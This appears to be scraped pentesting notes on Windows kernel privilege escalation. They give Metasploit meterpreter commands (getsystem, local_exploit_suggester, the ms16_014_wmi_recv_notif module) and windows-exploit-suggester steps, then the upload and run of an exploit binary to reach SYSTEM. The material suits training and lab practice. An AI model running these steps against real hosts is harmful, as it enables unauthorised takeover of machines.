Windows Kernel Exploit
Windows Kernel Exploitation
Tools and Environment
Demonstration w/ Metasploit
Demonstration Manual
Last updated
Last updated
# Assume having access to normal privileged account
getuid
getprivs
getsystem # auto technique of meterpreter to get privilege. But incase it fails?
search suggester
use post/multi/recon/local_exploit_suggester
show options
set SESSION
run
# search for the vulnerabilities and understand them before exploiting
# example exploitation
use exploit/windows/local/ms16_014_wmi_recv_notif
show options
set SESSION
run# Assume having access to normal privileged account
shell
systeminfo
# copy systeminfo output to a text file - sysinfo.txt
python3 windows-exploit-suggester.py --update
python3 windows-exploit-suggester.py --database [db.xls] --systeminfo sysinfo.txt
# In the meterpreter session --
cd Temp\\
upload exploit.exe # [exploit found from windows kernel exploits] search for exploit based on the suggestions
.\exploit.exe
whoami